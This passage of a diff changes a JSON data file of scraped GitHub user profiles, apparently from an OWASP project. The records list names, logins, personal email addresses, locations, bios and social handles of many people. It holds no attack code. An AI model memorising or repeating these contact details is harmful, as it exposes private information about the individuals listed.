"OxMarco_" + "twitter_username": "manishbisht9711" } }, { "model": "github.user", - "pk": 2866, + "pk": 8235, "fields": { - "nest_created_at": "2024-09-12T02:30:37.998Z", - "nest_updated_at": "2024-09-12T02:31:29.667Z", - "name": "Alvin", - "login": "flamecopper", - "email": "ykoo1@e.ntu.edu.sg", - "avatar_url": "https://avatars.githubusercontent.com/u/1225583?v=4", - "company": "", + "nest_created_at": "2024-09-22T09:45:20.370Z", + "nest_updated_at": "2024-09-22T19:44:23.750Z", + "name": "Sahil Omkumar Dhillon", + "login": "SahilDhillon21", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/118592065?v=4", + "company": "VJTI", "location": "", "collaborators_count": 0, - "following_count": 5, + "following_count": 4, "followers_count": 4, "public_gists_count": 0, "public_repositories_count": 12, - "created_at": "2011-11-28T15:14:07Z", - "updated_at": "2024-07-13T03:09:03Z", - "node_id": "MDQ6VXNlcjEyMjU1ODM=", + "created_at": "2022-11-19T06:54:08Z", + "updated_at": "2024-09-04T18:35:51Z", + "node_id": "U_kgDOBxGSQQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431903,49 +691802,74 @@ }, { "model": "github.user", - "pk": 2867, + "pk": 8236, "fields": { - "nest_created_at": "2024-09-12T02:30:43.258Z", - "nest_updated_at": "2024-09-12T02:30:43.258Z", - "name": "", - "login": "Robigus92", + "nest_created_at": "2024-09-22T09:45:20.682Z", + "nest_updated_at": "2024-09-22T19:44:24.060Z", + "name": "Nazim Qureshi", + "login": "officialarmannqureshi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26094268?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/91754196?v=4", "company": "", - "location": "", + "location": "Uttar Pradesh", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 38, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 75, + "created_at": "2021-10-01T17:57:30Z", + "updated_at": "2024-08-26T11:34:29Z", + "node_id": "U_kgDOBXgO1A", + "bio": "I've Dreams😇 But I Never think abt it as I always Work for it🏆", + "is_hireable": true, + "twitter_username": "imarmannqureshi" + } +}, +{ + "model": "github.user", + "pk": 8237, + "fields": { + "nest_created_at": "2024-09-22T09:45:21.321Z", + "nest_updated_at": "2024-09-22T19:44:24.693Z", + "name": "Abel Radac", + "login": "abelradac", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60584575?v=4", + "company": "", + "location": "Arad, Romania", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2017-02-28T17:49:39Z", - "updated_at": "2024-09-10T07:09:00Z", - "node_id": "MDQ6VXNlcjI2MDk0MjY4", + "public_repositories_count": 3, + "created_at": "2020-02-02T21:23:30Z", + "updated_at": "2024-09-13T11:19:55Z", + "node_id": "MDQ6VXNlcjYwNTg0NTc1", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2868, + "pk": 8238, "fields": { - "nest_created_at": "2024-09-12T02:30:46.652Z", - "nest_updated_at": "2024-09-12T02:30:46.652Z", + "nest_created_at": "2024-09-22T09:45:21.633Z", + "nest_updated_at": "2024-09-22T19:44:25.005Z", "name": "", - "login": "mariogd", + "login": "tarachris", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7890058?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9021580?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-06-14T19:12:42Z", - "updated_at": "2020-10-08T03:04:06Z", - "node_id": "MDQ6VXNlcjc4OTAwNTg=", + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2014-10-04T21:37:26Z", + "updated_at": "2022-11-23T04:31:19Z", + "node_id": "MDQ6VXNlcjkwMjE1ODA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431953,74 +691877,74 @@ }, { "model": "github.user", - "pk": 2869, + "pk": 8239, "fields": { - "nest_created_at": "2024-09-12T02:30:47.454Z", - "nest_updated_at": "2024-09-12T02:30:48.299Z", - "name": "Saurabh Nandedkar", - "login": "EXTREMOPHILARUM", - "email": "extremophilarum@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/22239978?v=4", + "nest_created_at": "2024-09-22T09:45:21.946Z", + "nest_updated_at": "2024-09-22T19:44:25.330Z", + "name": "Rafael Capdevielle", + "login": "rafen", + "email": "capdevielle@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/381332?v=4", "company": "", - "location": "", + "location": "Argentina", "collaborators_count": 0, - "following_count": 77, - "followers_count": 32, - "public_gists_count": 1, - "public_repositories_count": 39, - "created_at": "2016-09-16T14:36:59Z", - "updated_at": "2024-09-07T05:29:39Z", - "node_id": "MDQ6VXNlcjIyMjM5OTc4", + "following_count": 1, + "followers_count": 16, + "public_gists_count": 6, + "public_repositories_count": 33, + "created_at": "2010-08-30T23:21:28Z", + "updated_at": "2024-09-22T16:14:20Z", + "node_id": "MDQ6VXNlcjM4MTMzMg==", "bio": "", "is_hireable": true, - "twitter_username": "EXTREMOPHILARUM" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2870, + "pk": 8240, "fields": { - "nest_created_at": "2024-09-12T02:30:49.116Z", - "nest_updated_at": "2024-09-12T02:30:49.116Z", - "name": "Mohit sharma", - "login": "sharmamohit123", + "nest_created_at": "2024-09-22T09:45:22.276Z", + "nest_updated_at": "2024-09-22T19:44:25.644Z", + "name": "", + "login": "ordersys", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31919606?v=4", - "company": "IIIT Hyderabad", - "location": "Hyderabad", + "avatar_url": "https://avatars.githubusercontent.com/u/6969749?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 6, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 39, - "created_at": "2017-09-13T09:07:35Z", - "updated_at": "2024-02-20T19:55:31Z", - "node_id": "MDQ6VXNlcjMxOTE5NjA2", - "bio": "Research undergrad @IIIT-Hyderabad, open source contributor @OWASP", + "public_repositories_count": 8, + "created_at": "2014-03-16T23:23:31Z", + "updated_at": "2017-02-12T22:20:02Z", + "node_id": "MDQ6VXNlcjY5Njk3NDk=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2871, + "pk": 8241, "fields": { - "nest_created_at": "2024-09-12T02:30:52.425Z", - "nest_updated_at": "2024-09-12T02:30:52.425Z", - "name": "Rohan", - "login": "Rohan-Salwan", + "nest_created_at": "2024-09-22T09:45:22.591Z", + "nest_updated_at": "2024-09-22T19:44:25.959Z", + "name": "Nirajkumar Patel", + "login": "npxpatel", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/73494189?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/128296263?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 5, + "following_count": 23, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2020-10-26T18:15:10Z", - "updated_at": "2024-05-15T04:35:42Z", - "node_id": "MDQ6VXNlcjczNDk0MTg5", + "public_repositories_count": 15, + "created_at": "2023-03-19T12:11:55Z", + "updated_at": "2024-09-20T13:02:39Z", + "node_id": "U_kgDOB6WlRw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -432028,99 +691952,99 @@ }, { "model": "github.user", - "pk": 2872, + "pk": 8242, "fields": { - "nest_created_at": "2024-09-12T02:30:53.248Z", - "nest_updated_at": "2024-09-12T02:30:53.248Z", - "name": "", - "login": "Udbhavbisarya23", + "nest_created_at": "2024-09-22T09:45:23.326Z", + "nest_updated_at": "2024-09-22T19:44:26.607Z", + "name": "\\144\\150\\162\\165\\166", + "login": "drvcodenta", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43880582?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95343534?v=4", + "company": "JSS Academy of technical education", + "location": "Noida", "collaborators_count": 0, - "following_count": 30, - "followers_count": 12, + "following_count": 8, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2018-10-05T11:19:30Z", - "updated_at": "2024-08-24T22:37:50Z", - "node_id": "MDQ6VXNlcjQzODgwNTgy", - "bio": "Final Year, National Institute of Technology Karnataka. ", + "public_repositories_count": 30, + "created_at": "2021-12-01T09:00:12Z", + "updated_at": "2024-09-13T20:09:52Z", + "node_id": "U_kgDOBa7Trg", + "bio": "Web Developer ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2873, + "pk": 8243, "fields": { - "nest_created_at": "2024-09-12T02:30:54.061Z", - "nest_updated_at": "2024-09-12T02:30:54.061Z", + "nest_created_at": "2024-09-22T09:45:23.647Z", + "nest_updated_at": "2024-09-22T19:44:26.914Z", "name": "", - "login": "robindhondt95", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36512888?v=4", - "company": "", + "login": "gomgam", + "email": "gam@simplesat.io", + "avatar_url": "https://avatars.githubusercontent.com/u/2629750?v=4", + "company": "@simplesat ", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-02-15T16:46:08Z", - "updated_at": "2024-05-13T18:08:34Z", - "node_id": "MDQ6VXNlcjM2NTEyODg4", + "public_repositories_count": 23, + "created_at": "2012-10-23T07:58:19Z", + "updated_at": "2024-05-29T07:22:56Z", + "node_id": "MDQ6VXNlcjI2Mjk3NTA=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2874, + "pk": 8244, "fields": { - "nest_created_at": "2024-09-12T02:30:54.902Z", - "nest_updated_at": "2024-09-12T02:30:54.902Z", - "name": "", - "login": "rahultalekar", + "nest_created_at": "2024-09-22T09:45:23.964Z", + "nest_updated_at": "2024-09-22T19:44:27.223Z", + "name": "Akanksh Sinha", + "login": "akankshsinhaa", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32674792?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/91271963?v=4", "company": "", - "location": "", + "location": "Gurgaon, Haryana", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 14, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2017-10-10T12:55:13Z", - "updated_at": "2024-01-05T05:55:12Z", - "node_id": "MDQ6VXNlcjMyNjc0Nzky", - "bio": "Learn&Share", + "public_repositories_count": 37, + "created_at": "2021-09-23T14:30:55Z", + "updated_at": "2024-08-08T07:01:21Z", + "node_id": "MDQ6VXNlcjkxMjcxOTYz", + "bio": "Developer pursuing Bachelor In Technology in CSE at VIT, Chennai. Diligently looking for internships, collaborations and mentorships.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "SinhaAkanksh" } }, { "model": "github.user", - "pk": 2875, + "pk": 8245, "fields": { - "nest_created_at": "2024-09-12T02:30:55.740Z", - "nest_updated_at": "2024-09-12T02:30:55.741Z", - "name": "", - "login": "cybersecpwn", + "nest_created_at": "2024-09-22T09:45:24.341Z", + "nest_updated_at": "2024-09-22T19:44:27.551Z", + "name": "Vineet Chotaliya ", + "login": "Vineetttt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/85986040?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/105866260?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 19, + "followers_count": 14, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-06-16T07:09:09Z", - "updated_at": "2021-06-16T07:24:53Z", - "node_id": "MDQ6VXNlcjg1OTg2MDQw", + "public_repositories_count": 32, + "created_at": "2022-05-19T13:34:32Z", + "updated_at": "2024-08-31T16:30:46Z", + "node_id": "U_kgDOBk9kFA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -432128,49 +692052,49 @@ }, { "model": "github.user", - "pk": 2876, + "pk": 8246, "fields": { - "nest_created_at": "2024-09-12T02:30:56.549Z", - "nest_updated_at": "2024-09-12T02:30:56.549Z", - "name": "Michael Wager", - "login": "mwager", - "email": "mail@mwager.de", - "avatar_url": "https://avatars.githubusercontent.com/u/999748?v=4", + "nest_created_at": "2024-09-22T09:45:24.661Z", + "nest_updated_at": "2024-09-22T19:44:27.868Z", + "name": "Ujjwal", + "login": "TacticalPrice", + "email": "uk106692@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/102695961?v=4", "company": "", - "location": "", + "location": "Ghaziabad", "collaborators_count": 0, - "following_count": 42, - "followers_count": 21, - "public_gists_count": 4, - "public_repositories_count": 43, - "created_at": "2011-08-23T18:57:24Z", - "updated_at": "2024-08-22T07:22:23Z", - "node_id": "MDQ6VXNlcjk5OTc0OA==", - "bio": "Cyber security consultant with strong software engineering background", - "is_hireable": true, - "twitter_username": "michael_wager" + "following_count": 12, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 38, + "created_at": "2022-03-30T19:50:05Z", + "updated_at": "2024-09-03T11:18:59Z", + "node_id": "U_kgDOBh8EGQ", + "bio": "Fullstack Developer", + "is_hireable": false, + "twitter_username": "UjjwalKuma85361" } }, { "model": "github.user", - "pk": 2877, + "pk": 8247, "fields": { - "nest_created_at": "2024-09-12T02:30:58.216Z", - "nest_updated_at": "2024-09-12T02:30:58.216Z", - "name": "Eshwar S", - "login": "EsharkyTheGreat", + "nest_created_at": "2024-09-22T09:45:24.978Z", + "nest_updated_at": "2024-09-22T19:44:28.177Z", + "name": "Shubham Jaiswal", + "login": "shubham-200315", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/75795114?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/105916104?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 25, - "followers_count": 32, - "public_gists_count": 2, - "public_repositories_count": 56, - "created_at": "2020-12-10T14:21:58Z", - "updated_at": "2024-09-05T06:05:26Z", - "node_id": "MDQ6VXNlcjc1Nzk1MTE0", + "following_count": 4, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 48, + "created_at": "2022-05-20T09:14:05Z", + "updated_at": "2024-09-01T12:39:46Z", + "node_id": "U_kgDOBlAmyA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -432178,324 +692102,324 @@ }, { "model": "github.user", - "pk": 2878, + "pk": 8248, "fields": { - "nest_created_at": "2024-09-12T02:30:59.036Z", - "nest_updated_at": "2024-09-12T02:30:59.036Z", - "name": "bruh", - "login": "AmeliaYeah", + "nest_created_at": "2024-09-22T09:45:25.321Z", + "nest_updated_at": "2024-09-22T19:44:28.493Z", + "name": "bigOK", + "login": "bigOK666", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87606015?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/18575436?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 10, - "public_gists_count": 2, - "public_repositories_count": 3, - "created_at": "2021-07-18T12:37:27Z", - "updated_at": "2024-09-08T15:41:28Z", - "node_id": "MDQ6VXNlcjg3NjA2MDE1", - "bio": "", + "following_count": 25, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 94, + "created_at": "2016-04-20T13:17:01Z", + "updated_at": "2024-09-11T20:32:42Z", + "node_id": "MDQ6VXNlcjE4NTc1NDM2", + "bio": "Software Developer:)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2879, + "pk": 8249, "fields": { - "nest_created_at": "2024-09-12T02:30:59.849Z", - "nest_updated_at": "2024-09-12T02:30:59.849Z", - "name": "Gaurav ", - "login": "gaurav884", + "nest_created_at": "2024-09-22T09:45:25.631Z", + "nest_updated_at": "2024-09-22T19:44:28.821Z", + "name": "Saurabh Pandey", + "login": "Pandey-SaurabhP", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57193590?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/40917276?v=4", "company": "", - "location": "Mandi, Himachal Pradesh", + "location": "", "collaborators_count": 0, "following_count": 1, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 33, - "created_at": "2019-10-30T18:28:50Z", - "updated_at": "2023-12-04T17:26:40Z", - "node_id": "MDQ6VXNlcjU3MTkzNTkw", - "bio": "SDE-1 Intern @ LYBL || GSoC '23 '22 @ OWASP || NIT Hamirpur '23", + "public_repositories_count": 26, + "created_at": "2018-07-07T14:00:59Z", + "updated_at": "2024-08-08T17:39:22Z", + "node_id": "MDQ6VXNlcjQwOTE3Mjc2", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2880, + "pk": 8250, "fields": { - "nest_created_at": "2024-09-12T02:31:00.693Z", - "nest_updated_at": "2024-09-12T02:31:00.693Z", - "name": "Josh Robar", - "login": "jerobar", - "email": "joshrobar@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/20042690?v=4", + "nest_created_at": "2024-09-22T09:45:26.265Z", + "nest_updated_at": "2024-09-22T19:44:29.455Z", + "name": "Rafael Amancio", + "login": "Rafael-gc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78448105?v=4", "company": "", - "location": "Davao City, Philippines", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, - "public_gists_count": 2, - "public_repositories_count": 17, - "created_at": "2016-06-20T10:53:44Z", - "updated_at": "2024-08-14T02:47:54Z", - "node_id": "MDQ6VXNlcjIwMDQyNjkw", - "bio": "", + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-02-02T21:15:18Z", + "updated_at": "2024-08-21T19:52:20Z", + "node_id": "MDQ6VXNlcjc4NDQ4MTA1", + "bio": "Software Developer | Full-Stack Developer | Fluent in English", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2881, + "pk": 8251, "fields": { - "nest_created_at": "2024-09-12T02:31:01.489Z", - "nest_updated_at": "2024-09-12T02:31:01.489Z", - "name": "Sebastian", - "login": "sebix", - "email": "sebix@sebix.at", - "avatar_url": "https://avatars.githubusercontent.com/u/199050?v=4", - "company": "Institute for Common Good Technology", - "location": "Austria", + "nest_created_at": "2024-09-22T09:45:26.587Z", + "nest_updated_at": "2024-09-22T19:44:29.763Z", + "name": "Pranav Arya", + "login": "pranav-iitr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/76247369?v=4", + "company": "", + "location": "INDIA", "collaborators_count": 0, - "following_count": 249, - "followers_count": 103, - "public_gists_count": 7, - "public_repositories_count": 120, - "created_at": "2010-02-07T19:03:02Z", - "updated_at": "2024-09-08T15:18:18Z", - "node_id": "MDQ6VXNlcjE5OTA1MA==", - "bio": "", + "following_count": 5, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 64, + "created_at": "2020-12-19T10:16:29Z", + "updated_at": "2024-09-15T13:57:48Z", + "node_id": "MDQ6VXNlcjc2MjQ3MzY5", + "bio": "Undergrad at IIT Roorkee | Developer at @Ecell-IITR, @ariesiitr and Inter IIT Sports | Dev and Machine Learning enthusiast | Triple Medalist Inter IIT Tech Meet", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2882, + "pk": 8252, "fields": { - "nest_created_at": "2024-09-12T02:31:03.149Z", - "nest_updated_at": "2024-09-12T02:31:03.149Z", - "name": "Aviral Jain", - "login": "ph1ne4s", - "email": "jainaviral2002@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/54772821?v=4", - "company": "@InfoSecIITR @marsiitr", - "location": "IIT Roorkee", + "nest_created_at": "2024-09-22T09:45:26.900Z", + "nest_updated_at": "2024-09-22T19:44:30.081Z", + "name": "Manice18", + "login": "Manice18", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/91601706?v=4", + "company": "", + "location": "Somewhere in this world", "collaborators_count": 0, - "following_count": 86, - "followers_count": 22, + "following_count": 17, + "followers_count": 25, "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2019-09-01T14:51:49Z", - "updated_at": "2024-08-28T12:15:08Z", - "node_id": "MDQ6VXNlcjU0NzcyODIx", - "bio": "GSoC'23 @OWASP | IIT Roorkee'25\r\n", + "public_repositories_count": 38, + "created_at": "2021-09-29T10:04:00Z", + "updated_at": "2024-09-17T19:09:29Z", + "node_id": "U_kgDOBXW7Kg", + "bio": "", "is_hireable": true, - "twitter_username": "ph1ne4s7" + "twitter_username": "Manice18heree" } }, { "model": "github.user", - "pk": 2883, + "pk": 8253, "fields": { - "nest_created_at": "2024-09-12T02:31:03.977Z", - "nest_updated_at": "2024-09-12T02:31:03.977Z", - "name": "", - "login": "jeanphi72", + "nest_created_at": "2024-09-22T09:45:54.634Z", + "nest_updated_at": "2024-09-22T19:44:58.156Z", + "name": "Ananya Singh", + "login": "Ananyasingh2002", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/86831014?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/90714878?v=4", + "company": "BS Group", + "location": "Pune, Maharashtra ", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 26, + "followers_count": 111, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-07-02T10:13:05Z", - "updated_at": "2023-06-05T07:02:24Z", - "node_id": "MDQ6VXNlcjg2ODMxMDE0", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "public_repositories_count": 38, + "created_at": "2021-09-14T16:42:45Z", + "updated_at": "2024-09-20T12:34:20Z", + "node_id": "MDQ6VXNlcjkwNzE0ODc4", + "bio": "Full Stack Developer | Effective Communicator | Stock Enthusiast | Astronomy Hobbyist", + "is_hireable": true, + "twitter_username": "Ananyasingh4458" } }, { "model": "github.user", - "pk": 2884, + "pk": 8254, "fields": { - "nest_created_at": "2024-09-12T02:31:05.592Z", - "nest_updated_at": "2024-09-12T02:31:05.592Z", - "name": "", - "login": "dookofcrds", + "nest_created_at": "2024-09-22T09:45:55.305Z", + "nest_updated_at": "2024-09-22T19:44:58.823Z", + "name": "Mrunalraj", + "login": "MrunalrajRedij", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43824616?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/75795149?v=4", "company": "", - "location": "", + "location": "India", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 12, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2018-10-03T17:34:15Z", - "updated_at": "2024-02-28T15:20:02Z", - "node_id": "MDQ6VXNlcjQzODI0NjE2", - "bio": "🔐 Professional Cybersecurity Analyst | Penetration Tester | Expert in Ethical Hacking & Security\r\n\r\n🌐 Helping organizations secure their digital assets | ", + "public_repositories_count": 16, + "created_at": "2020-12-10T14:22:36Z", + "updated_at": "2024-07-12T15:30:20Z", + "node_id": "MDQ6VXNlcjc1Nzk1MTQ5", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2885, + "pk": 8255, "fields": { - "nest_created_at": "2024-09-12T02:31:06.390Z", - "nest_updated_at": "2024-09-12T02:31:06.390Z", - "name": "Nam Võ", - "login": "namdodayne", + "nest_created_at": "2024-09-22T09:45:55.621Z", + "nest_updated_at": "2024-09-22T19:44:59.139Z", + "name": "Rachit Agrawal", + "login": "Rancho-rachit", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57885184?v=4", - "company": "SNP-VSEC", - "location": "Vietnam", + "avatar_url": "https://avatars.githubusercontent.com/u/111473259?v=4", + "company": "", + "location": "Indore", "collaborators_count": 0, - "following_count": 6, - "followers_count": 3, - "public_gists_count": 1, - "public_repositories_count": 42, - "created_at": "2019-11-18T04:12:23Z", - "updated_at": "2024-09-04T08:59:13Z", - "node_id": "MDQ6VXNlcjU3ODg1MTg0", - "bio": "Penetration Tester | Security Engineer", + "following_count": 45, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2022-08-18T01:25:51Z", + "updated_at": "2024-09-13T21:27:32Z", + "node_id": "U_kgDOBqTyaw", + "bio": "Learning ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "rancho_rachit" } }, { "model": "github.user", - "pk": 2886, + "pk": 8256, "fields": { - "nest_created_at": "2024-09-12T02:31:07.228Z", - "nest_updated_at": "2024-09-18T19:11:12.385Z", - "name": "Pratham Agarwal", - "login": "Pratham1812", + "nest_created_at": "2024-09-22T09:45:56.257Z", + "nest_updated_at": "2024-09-22T19:44:59.807Z", + "name": "", + "login": "Yashsomalkar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32198580?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95977604?v=4", + "company": "Indian Institute of Technology Varanasi (BHU)", + "location": "Varanasi, Uttarpradesh", "collaborators_count": 0, - "following_count": 26, - "followers_count": 19, - "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2017-09-22T13:17:52Z", - "updated_at": "2024-09-13T14:04:37Z", - "node_id": "MDQ6VXNlcjMyMTk4NTgw", - "bio": "ECE undergrad @IITRoorkee | CTF player with @InfoSecIITR | Developer @mdgspace | GSoC '24 @OWASP\r\n", + "following_count": 45, + "followers_count": 26, + "public_gists_count": 3, + "public_repositories_count": 66, + "created_at": "2021-12-11T17:16:32Z", + "updated_at": "2024-09-17T06:30:50Z", + "node_id": "U_kgDOBbiAhA", + "bio": "CTF player | CSAW'22 CTF 2nd in India Region | bronze in SNEAKING INTO THE CYBERCRACKS by Saptang Labs |Native android Developer|Flutter |IIT(BHU)", "is_hireable": false, - "twitter_username": "" + "twitter_username": "rudrakshacker" } }, { "model": "github.user", - "pk": 2887, + "pk": 8257, "fields": { - "nest_created_at": "2024-09-12T02:31:09.019Z", - "nest_updated_at": "2024-09-12T02:31:09.019Z", - "name": "Rahul Surwade", - "login": "rahulsurwade08", - "email": "rtr.rahulsurwade@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/93492791?v=4", - "company": "", + "nest_created_at": "2024-09-22T09:46:13.642Z", + "nest_updated_at": "2024-09-22T19:45:17.207Z", + "name": "Maik Jäkel", + "login": "MaikJaek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7796201?v=4", + "company": "Lampenwelt GmbH", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, + "following_count": 2, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2021-10-31T20:40:38Z", - "updated_at": "2024-08-24T21:55:29Z", - "node_id": "U_kgDOBZKWNw", - "bio": "Cloud and Cybersecurity Practitioner", + "public_repositories_count": 8, + "created_at": "2014-06-04T16:20:08Z", + "updated_at": "2024-08-27T10:06:02Z", + "node_id": "MDQ6VXNlcjc3OTYyMDE=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2888, + "pk": 8258, "fields": { - "nest_created_at": "2024-09-12T02:31:10.649Z", - "nest_updated_at": "2024-09-12T02:31:10.649Z", - "name": "Aleksa Majkić", - "login": "AleksaMCode", - "email": "aleksamcode@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/23129943?v=4", - "company": "", - "location": "Banja Luka, Bosnia and Herzegovina", + "nest_created_at": "2024-09-22T09:46:13.951Z", + "nest_updated_at": "2024-09-22T19:45:17.521Z", + "name": "Zach Jones", + "login": "ProZachJ", + "email": "prozachj@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2414138?v=4", + "company": "@venafi", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 73, - "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2016-10-28T23:24:15Z", - "updated_at": "2024-08-30T10:16:23Z", - "node_id": "MDQ6VXNlcjIzMTI5OTQz", - "bio": "I code. Sometimes.", + "following_count": 4, + "followers_count": 7, + "public_gists_count": 3, + "public_repositories_count": 31, + "created_at": "2012-09-24T18:45:09Z", + "updated_at": "2024-08-22T17:21:46Z", + "node_id": "MDQ6VXNlcjI0MTQxMzg=", + "bio": "", "is_hireable": false, - "twitter_username": "aleksamcode" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2889, + "pk": 8259, "fields": { - "nest_created_at": "2024-09-12T02:31:11.472Z", - "nest_updated_at": "2024-09-12T02:31:12.310Z", - "name": "", - "login": "vbondarchuk", + "nest_created_at": "2024-09-22T09:46:14.276Z", + "nest_updated_at": "2024-09-22T19:45:17.872Z", + "name": "Mahmoud Mohammadi", + "login": "mahmoodm2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39590898?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9711991?v=4", + "company": "Microsoft", + "location": "Seattle", "collaborators_count": 0, "following_count": 5, - "followers_count": 0, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-05-24T12:33:39Z", - "updated_at": "2024-06-06T04:47:09Z", - "node_id": "MDQ6VXNlcjM5NTkwODk4", - "bio": "", - "is_hireable": false, + "public_repositories_count": 73, + "created_at": "2014-11-13T05:17:45Z", + "updated_at": "2024-05-22T00:22:35Z", + "node_id": "MDQ6VXNlcjk3MTE5OTE=", + "bio": "Deep Learning, NLP, Privacy Preserving Machine Learning", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2890, + "pk": 8260, "fields": { - "nest_created_at": "2024-09-12T02:31:13.133Z", - "nest_updated_at": "2024-09-13T05:04:25.994Z", - "name": "Vinh Pham Ngoc Thanh", - "login": "VinhPham2106", - "email": "vphamngo@purdue.edu", - "avatar_url": 